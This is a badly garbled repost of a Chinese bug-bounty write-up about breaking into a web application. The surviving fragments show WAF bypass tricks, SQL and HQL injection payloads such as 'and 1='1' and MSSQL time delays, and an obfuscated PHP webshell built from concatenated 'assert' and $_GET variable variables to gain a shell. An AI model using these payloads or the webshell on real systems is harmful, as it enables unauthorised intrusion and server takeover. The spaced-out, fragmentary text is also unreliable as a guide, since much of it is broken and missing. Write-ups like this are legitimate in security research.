[28573] 2020-09-11_一次挖掘SRC漏洞-从0到有

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-19
2020-09-11_一次挖掘SRC漏洞-从0到有 S R C   -   0 0 n e   O t s   2 0 2 0 - 0 9 - 1 1   0 n e S R C   : X X X X X :   w w w . A . c o m X x x x x x x :   w w w . B . c o m 6 ,   ,   A . c o m   l a y e r A . c o m   S Q L     1   1 1     1 S Q L   1 .   1 . 1 .     i n t 1 . 2 .     W a f     s e ' l ' e ' c ' t = s e l e c t 2 .   X S S p l a n   B w a f W A F , 1 . w a f  
2 . w a f ( ) ? x = 1   u n i o n   s e l e c t W a f   W a f W A F ,   a   b i d b y p a s s     X S S     3 0 2   4 0 3   2 0 0     B U R P   I P  
3 0 2   t z t z u r l       F u z z   a d d     h t t p s : / / g i t h u b . c o m / T h e K i n g O f D u c k / f u z z D i c t s   F u z z   u s e r n a m e = 1   & n a m e = 1     r e a l n a m e  
O K           i d c a r d   ,   s f z = 1     4   s f z h = 1   1     S Q L     a n d  
  w a f   w a f a = / & u s e r n a m e = 1 '   a n d   1 = ' 1 & r e a l n a m e = 1 & s f z h = 1 1 1 ' & b = / p a y l o a d 1 = 2     S Q L     s q l m a p I P   a n d   1 = d d d d     m s s q l     w a i t f o r   d e l a y   H Q L     .   h q l m a p H Q L     a n d   u s e r = 1     1     i n t   s u b s t r i n g   u s e r   u s e r d b o
d b o   m s s q l     p a y l o a d m s s q l   S Q L 西 , P H P     W A F   j p g     (   )   G e t s h e l l   g o     .     < ? p h p   p h p i n f o     < ? = ? > < ? = p h p i n f o ( ) ? >     p h p   =   e c h o
p h p 5 . 6   p h p 7 . 0 p h p a s s e r t   $ a = ' a ' . ' s ' . ' s e r t ' ; $ _ G E T [ ' a ' ] , $ _ P S O T [ ' b ' ] . . . .     F U Z Z       $ _ G E T     f o r e a c h f o r e a c h   ( $ _ G E T   a s   $ k e y = > $ v a l u e ) {         $ $ k e y = $ v a l u e ; } , $ k e y     $ _ G E T [ ' k e y ' ]   $ a ( $ k e y ) ;   a s s e r t ( $ _ G E T [ ' k e y ' ] ) S H E L L   ~
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则